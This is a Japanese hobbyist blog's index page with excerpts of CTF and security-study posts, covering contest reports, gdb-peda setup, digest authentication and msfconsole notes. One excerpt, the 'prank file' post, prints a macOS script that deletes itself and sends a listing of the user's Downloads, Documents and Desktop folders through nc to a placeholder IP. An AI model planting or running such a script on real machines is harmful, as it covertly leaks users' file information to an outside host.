つけじょにーのすぱげていコード

主に、競技プログラミング、セキュリティのお勉強の際に書いたすぱげていコードを書き込みます

CTF

SECCON2015予選に参加してみた話

CTF

今回、チームsosuncer(そすんさー)で参加してきました。 チーム全体では900Pを稼ぎ、213位でした。私はほとんど役に立てませんでした。じゃあ、お前は何をやったんだということなんですが、 解けたのは2問 1. Connect the server 2. Last challenge(Thank…

Trend Micro CTF 2015 に参加した

CTF

チームsendyで、TMCTFに参加しました。 相も変わらず解ける問題が少なくて人権の無い日々が続きます結局、僕が解けたのはProgramming 200だけです。 とりあえず、解けた問題について書いてみます。まず、どんな問題なのか。 netcatで接続すると、計算問題が…

TDU CTF 2015に参加してきた

CTF

どうも、CTF初心者が通ります。 本日、TDUCTF 2015に参加してきました! 最初は補欠だったのですが、枠が増えたことにより、繰り上がらせてもらえました(歓喜) なかなか問題が解けなくて、サービスをいただいたおかげで解けた問題が大半を占めているのです…

Watashi wa tottemo katagaitai!!

CTF

本日、秋葉原UDXで肩を痛くしてまいりました。 ついでに自分のバイナリ力の無さに胸を痛くもしましたが・・・(オイオイWrite-upとまではいきませんが、紹介されたgdb-pedaのインストールに躓いたのでメモ。 使用環境がUbuntu 14.04であり、gdbがすでにインスト…

セキュキャンに応募しました

CTF

もうすでに応募してから4日経ちましたが、応募報告です。 提出した後で、GithubのMyMapWithAPIのAPIキーについて、readme作成するの忘れてしまった!!!ってなってげんなりしてます。今年からCTFを友人と始めたので、セキュキャンを知ったのは今年始まって…

ksnctf Digest is secure!

CTF

ダイジェスト認証の問題。 かなり勉強になった(ダイジェスト認証についてのみ) Authorizedヘッダに書かれている値をこねくり回して解くんだけど、単純なやり方ではダメ。 responseの作り方は以下を参照してもらえばわかると思うDigest認証 | Wikiwandwww.w…

いたずらファイル

CTF

example.command #!/bin/bash cd Desktop; echo "hacked this computer!" | cat > hack.txt; mydir=$(dirname $0); cd $mydir; srm -mz example.command; cd; ls Downloads Documents Desktop | nc xxx.xxx.xxx.xxx 8000;対MacOSX用なのですが、実行されると…

msfconsoleについて

CTF

毎回やり方わすれるので、ここにメモ書きしておこうかなとmsfconsoleはGUIではないので、GUIを使いたい場合はArmitageというのがあるらしいです > msfconsole msf > help //ヘルプ表示 msf > search [ターゲット] //ターゲットのモジュール検索 msf > use [e…

シンボリックリンクについて

CTF

自分にとって今の所使う機会が少なく、久しぶりに使うと毎回同じミスをしてしまうのですが、ファイルを作ってからリンクさせる のではなく リンクファイルを作成するコマンドですなので、touchやvimなど使う必要はなく、lnコマンドの引数にちゃんと対象ファ…